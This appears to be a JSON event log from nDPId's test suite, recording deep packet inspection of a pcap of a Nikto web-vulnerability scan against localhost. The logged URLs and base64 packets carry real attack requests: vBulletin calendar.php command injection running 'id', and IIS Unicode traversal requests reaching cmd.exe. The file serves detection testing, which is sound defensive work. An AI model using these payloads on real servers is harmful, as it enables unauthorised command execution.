Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7560000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1576420277861,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":309,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":309,"pkt_l4_len":275,"thread_ts_msec":1576420277861,"pkt":"AAAAAAAAAAAAAAAACABFAAEntyFAAEAGhK1\/AAABfwAAAcdCH5DLAI4n0VAE+IAYAED\/GwAAAQEICp1m\/42dZv+NR0VUIC92Yi9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7560000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1576420277863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277863,"pkt":"AAAAAAAAAAAAAAAACABFAAEuCCBAAEAGM6h\/AAABfwAAAcdEH5ADaDEo9nQ1BIAYAED\/IgAAAQEICp1m\/4+dZv+PR0VUIC92YnVsbGV0aW4vY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1576420277864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277864,"pkt":"AAAAAAAAAAAAAAAACABFAADJt5hAAEAGhJR\/AAABfwAAAcdGH5CwLY6th0R7wIAYAED+vQAAAQEICp1m\/5CdZv+QR0VUIC9fdnRpX2Jpbi9mcGNvdW50LmV4ZSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDg5KQ0KDQo="} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1576420277866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277866,"pkt":"AAAAAAAAAAAAAAAACABFAADHtYVAAEAGhql\/AAABfwAAAcdIH5CyuYy6IN3YVoAYAED+uwAAAQEICp1m\/5KdZv+SR0VUIC9zaXRlL2VnL3NvdXJjZS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxMjYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1576420277867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277867,"pkt":"AAAAAAAAAAAAAAAACABFAADlWiBAAEAG4fB\/AAABfwAAAcdKH5CvgWMmQVkzqIAYAED+2QAAAQEICp1m\/5OdZv+TR0VUIC9jZXJ0c3J2Ly4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1576420277870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277870,"pkt":"AAAAAAAAAAAAAAAACABFAADwKqRAAEAGEWJ\/AAABfwAAAcdMH5CrChOaUJIGgIAYAED+5AAAAQEICp1m\/5adZv+WR0VUIC9jZ2ktYmluLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1576420277871,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277871,"pkt":"AAAAAAAAAAAAAAAACABFAADnEqJAAEAGKW1\/AAABfwAAAcdOH5CE7yudGG3JzIAYAED+2wAAAQEICp1m\/5edZv+XR0VUIC9paXNhZG1wd2QvLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMTkyKQ0KDQo="} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7560000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1576420277873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1576420277873,"pkt":"AAAAAAAAAAAAAAAACABFAADuNNpAAEAGBy5\/AAABfwAAAcdQH5AuMg3l88MKY4AYAED+4gAAAQEICp1m\/5mdZv+ZR0VUIC9tc2FkYy8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MykNCg0K"} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7560000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7560000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1576420277874,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1576420277874,"pkt":"AAAAAAAAAAAAAAAACABFAADxWrBAAEAG4VR\/AAABfwAAAcdSH5DZZWOTGgkmxYAYAED+5QAAAQEICp1m\/5qdZv+aR0VUIC9wYnNlcnZlci8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7560000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1576420277875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277875,"pkt":"AAAAAAAAAAAAAAAACABFAADs1jZAAEAGZdN\/AAABfwAAAcdUH5CUA+8Kq3ejjIAYAED+4AAAAQEICp1m\/5udZv+bR0VUIC9ycGMvLi4lYzAlYWYuLi8uLiVjMCVhZi4uL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}} 